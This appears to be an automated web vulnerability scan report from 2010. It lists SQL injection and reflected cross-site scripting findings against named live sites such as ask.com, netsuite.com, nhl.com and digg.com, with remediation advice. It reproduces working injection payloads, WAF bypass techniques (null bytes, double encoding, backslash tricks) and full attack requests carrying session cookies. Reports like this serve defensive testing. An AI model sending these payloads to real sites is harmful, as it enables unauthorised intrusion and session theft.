SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 25257047'%20or%201%3d1--%20 and 25257047'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /jsignin25257047'%20or%201%3d1--%20?o=0&l=dir HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
The gc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /local?qsrc=3103 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00'; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
Diners who want to experience exceptional Indian cuisine take a short trip to Bombay Brasserie. Now, in addition to our existing West University location, we are pleased to announce the opening of our Galleria location, just off of 610 and ...[SNIP]...
Request 2
GET /local?qsrc=3103 HTTP/1.1 Host: www.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00''; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2636'%3balert(1)//bbf2983398d was submitted in the kw parameter. This input was echoed as b2636';alert(1)//bbf2983398d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.2. http://ad.vulnerable.ad.partner/adj/Auctions/ros [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/Auctions/ros
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2667'-alert(1)-'aad659deeb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.3. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29442"-alert(1)-"a82b9d9e55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:50:15 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sat, 20 Nov 2010 16:50:15 GMT Pragma: no-cache Content-Length: 4334 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?29442"-alert(1)-"a82b9d9e55a=1&Z=300x250&s=1299725&_salt=1744088892";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A ...[SNIP]...
The value of the id request parameter is copied into the HTML document as text between TITLE tags. The payload 5f651</title><script>alert(1)</script>0e9cb24f1cc was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/ncommerce3/User?id=hfcNHL5f651</title><script>alert(1)</script>0e9cb24f1cc&wl=12717464&type=L HTTP/1.1 Host: auction.nhl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2a4"><script>alert(1)</script>a0866ed5e5f was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/ncommerce3/User?id=hfcNHLbe2a4"><script>alert(1)</script>a0866ed5e5f&wl=12717464&type=L HTTP/1.1 Host: auction.nhl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcbb"><script>alert(1)</script>597da3a48aa was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/ncommerce3/User?id=hfcNHL&wl=12717464&type=L2dcbb"><script>alert(1)</script>597da3a48aa HTTP/1.1 Host: auction.nhl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e was submitted in the REST URL parameter 4. This input was echoed as d1205'style='x:expression(alert(1))'04ac6827f1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /app/center/nlvisitor.nl/c.1034828d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e/n.3/sc.6/.f HTTP/1.1 Host: checkout.netsuite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea1e0%2527a%253d%2527b%2527a4e19e91a04 was submitted in the REST URL parameter 5. This input was echoed as ea1e0'a='b'a4e19e91a04 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /app/center/nlvisitor.nl/c.1034828/n.3ea1e0%2527a%253d%2527b%2527a4e19e91a04/sc.6/.f HTTP/1.1 Host: checkout.netsuite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12983'><script>alert(1)</script>f4dd61d6b9f81a0d8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87277'><script>alert(1)</script>0d33e5361ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the redirect request parameter is copied into the HTML document as plain text between tags. The payload f1799<script>alert(1)</script>85b0cbdcd5eeb48c1 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a32"%3b9a1fdcd0d7 was submitted in the REST URL parameter 1. This input was echoed as 67a32";9a1fdcd0d7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Sat, 20 Nov 2010 17:28:59 GMT Server: Apache Content-Length: 2691 Expires: Sun, 21 Nov 2010 07:15:59 GMT Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT encoding: UTF-8 Content-Language: UTF-8 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Keep-Alive: timeout=10, max=999 Connection: Keep-Alive Content-Type: text/javascript; charset=UTF-8
...[SNIP]...
alert("Script file 'https://checkout.netsuite.com/67a32";9a1fdcd0d7/site/drop_down_menu/anylinkcssmenu.js' not found");
2.13. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://checkout.netsuite.com
Path:
/citricle-ga/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7175f\'%3balert(1)//122e2e8962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7175f\\';alert(1)//122e2e8962c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /citricle-ga/?7175f\'%3balert(1)//122e2e8962c=1 HTTP/1.1 Host: checkout.netsuite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
2.14. https://checkout.netsuite.com/citricle-ga/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://checkout.netsuite.com
Path:
/citricle-ga/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d377\' style=x:expression(alert(1)) caad02a7c27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /citricle-ga/?5d377'%20style%3dx%3aexpression(alert(1))%20caad02a7c27=1 HTTP/1.1 Host: checkout.netsuite.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; loginredirect=T; JSESSIONID=dhQMMyJDpGpPkZGgt12gQSdl2ZxqXVLWRpRGDFyvG6Jv4j6tbFfKcQZD64vmtnhKLhRymJDB9Fv1RDGJXWqCm5hvXJvNQ9fxsVfFB0tVjPwKYx6gZ1fBZsh1JQYRnRZG!-1642534427; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.4.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49886"%3bd493f9d8869 was submitted in the REST URL parameter 1. This input was echoed as 49886";d493f9d8869 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Date: Sat, 20 Nov 2010 17:50:29 GMT Server: Apache Content-Length: 2672 Expires: Sun, 21 Nov 2010 07:15:29 GMT Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT encoding: UTF-8 Content-Language: UTF-8 P3P: CP="CAO PSAa OUR BUS PUR" Vary: User-Agent Keep-Alive: timeout=10, max=974 Connection: Keep-Alive Content-Type: text/javascript; charset=UTF-8
...[SNIP]...
alert("Script file 'https://checkout.netsuite.com/javascript49886";d493f9d8869/help.js' not found");
2.16. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://checkout.netsuite.com
Path:
/s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %009847a'style%3d'x%3aexpression(alert(1))'ba0bac45916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9847a'style='x:expression(alert(1))'ba0bac45916 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
2.17. https://checkout.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://checkout.netsuite.com
Path:
/s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bc49'style='x:expression(alert(1))'02b68d32520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be972'><script>alert(1)</script>b07e51e7e4a was submitted in the vid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4efa7'-alert(1)-'c39736470a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/turn4efa7'-alert(1)-'c39736470a4 HTTP/1.1 Host: dictionary.reference.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005cb94"><script>alert(1)</script>0818a587233 was submitted in the REST URL parameter 1. This input was echoed as 5cb94"><script>alert(1)</script>0818a587233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%005cb94"><script>alert(1)</script>0818a587233 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 729d1<script>alert(1)</script>ee38120a664 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr729d1<script>alert(1)</script>ee38120a664 HTTP/1.1 Host: ds.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dt=X; uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 246 Content-Type: text/javascript Set-Cookie: di=%7B%7D..1290271839.10R|1290201756.60|1289335234.66; Domain=.addthis.com; Expires=Mon, 19-Nov-2012 04:52:57 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 20 Dec 2010 16:50:39 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sat, 20 Nov 2010 16:50:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 16:50:39 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload acd1e<script>alert(1)</script>a8518672223 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c305d\'%3b635163da252 was submitted in the q parameter. This input was echoed as c305d\\';635163da252 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /pictures?qsrc=0&o=0&l=dir&q=c305d\'%3b635163da252 HTTP/1.1 Host: images.ask.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b626"><script>alert(1)</script>9ec3e8ecc13 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
